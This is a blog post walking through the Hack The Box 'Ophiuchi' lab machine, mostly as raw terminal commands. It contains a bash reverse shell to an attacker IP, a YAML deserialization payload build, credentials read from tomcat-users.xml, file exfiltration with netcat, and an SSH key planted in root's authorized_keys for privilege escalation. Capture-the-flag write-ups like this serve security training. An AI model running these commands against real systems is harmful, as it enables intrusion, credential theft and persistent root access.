Hack The Box – Ophiuchi

saksham dixitFeb 20, 2024

http://10.10.10.227:8080/

┌──(root💀kali)-[/home/kali/Downloads]

└─# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts

┌──(root💀kali)-[/home/kali/Downloads]

└─# git clone https://github.com/artsploit/yaml-payload

┌──(root💀kali)-[/home/kali/Downloads/yaml-payload]

└─# cat rev.sh

#!/bin/sh

bash -i >& /dev/tcp/10.10.14.16/8888 0>&1

┌──(root💀kali)-[/home/kali/Downloads/yaml-payload/src]

└─# gedit artsploit/AwesomeScriptEngineFactory.java

root@osboxes:~/Downloads/yaml-payload# javac src/artsploit/AwesomeScriptEngineFactory.java

root@osboxes:~/Downloads/yaml-payload# jar -cvf yaml-payload.jar -C src/ .

Now we go to browser

tomcat@ophiuchi:/$ cd /opt

tomcat@ophiuchi:/opt$ ls –lrt

tomcat@ophiuchi:/opt$ cd tomcat

tomcat@ophiuchi:~$ ls –lrt

tomcat@ophiuchi:~$ cd conf

tomcat@ophiuchi:~/conf$ ls –lrt

tomcat@ophiuchi:~/conf$ cat tomcat-users.xml

So here

Username: admin

Password: whythereisalimit

root@osboxes:~/Downloads/yaml-payload# ssh admin@10.10.10.227

admin@ophiuchi:~$ sudo –l

admin@ophiuchi:~$ cat /opt/wasm-functions/index.go

admin@ophiuchi:~$ cd /tmp

admin@ophiuchi:/tmp$ mkdir work && cd work

admin@ophiuchi:/tmp/work$ cp /opt/wasm-functions/main.wasm ./

admin@ophiuchi:/tmp/work$ sudo /usr/bin/go run /opt/wasm-functions/index.go

root@osboxes:~/Downloads/yaml-payload# nc -lvnp 1234 > main.wasm

admin@ophiuchi:/tmp/work$ cat main.wasm | nc 10.10.14.16 1234

https://webassembly.github.io/wabt/demo/wasm2wat/index.html

https://webassembly.github.io/wabt/demo/wat2wasm/index.html

root@osboxes:~/Downloads# cp test.wasm main.wasm

root@osboxes:~/Downloads# scp main.wasm admin@ophiuchi.htb:/tmp/work

root@osboxes:~/Downloads# ssh-keygen

echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvqChvcSz6rYFdxAqmgvFzTF5f6XYM05Gg21FzfiuU7MyUNj4Ak2FyxbtKZv01YoD91EetadIbhc/6pRS7Bu37j8lxsV1NjdaKewvsw0JCHfzqqghdYeNC0zHLZBrlfdb6AGGUMgYc3zTK/7mSc2X5vwRtcIMKYgwBB7x5JWH/b2t0SbVSpQRzPYpE4RwA/coPsbzY1BIJjuLk/Pv39M04WiDbG3nKVMmP+RyozKPwzp2C2FMjBXCfj7lPe/0NHb2Qr1F5XCwHoEzAVE0uGXvjyLtyKMJlMbagJO63NG5WCFUonwfF7UpOeZR43VdxzG2lT4XfwxawOMMcJPJAoluF root@osboxes” > /root/.ssh/authorized_keys

admin@ophiuchi:/tmp/work$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go

Hi, I’m saksham dixit

All My Articles

Hack The Box – Spectra

──(root💀kali)-[/home/kali/Downloads] └─# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/...

saksham dixitFeb 21, 2024

Hack The Box – Breadcrumbs

http://10.10.10.228/ ┌──(root💀kali)-[/home/kali/Downloads/ffuf] └─# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.228/FUZZ https://10.10.10.228/php/books.php...

saksham dixitFeb 20, 20241 Comment

Hack The Box – Scriptkiddie

http://10.10.10.226:5000/ exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ User.txt: ebca83b5823fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX echo...

saksham dixitFeb 20, 2024

Hack The Box – Ophiuchi

Hi, I’m saksham dixit

Leave a Reply Cancel reply

Recent Posts

Recent Comments

Archives

Categories

Hi, I’m saksham dixit

Related Posts

Hack The Box – Spectra

Hack The Box – Breadcrumbs

Hack The Box – Scriptkiddie

Leave a Reply Cancel reply

Recent Posts

Recent Comments

Archives

Categories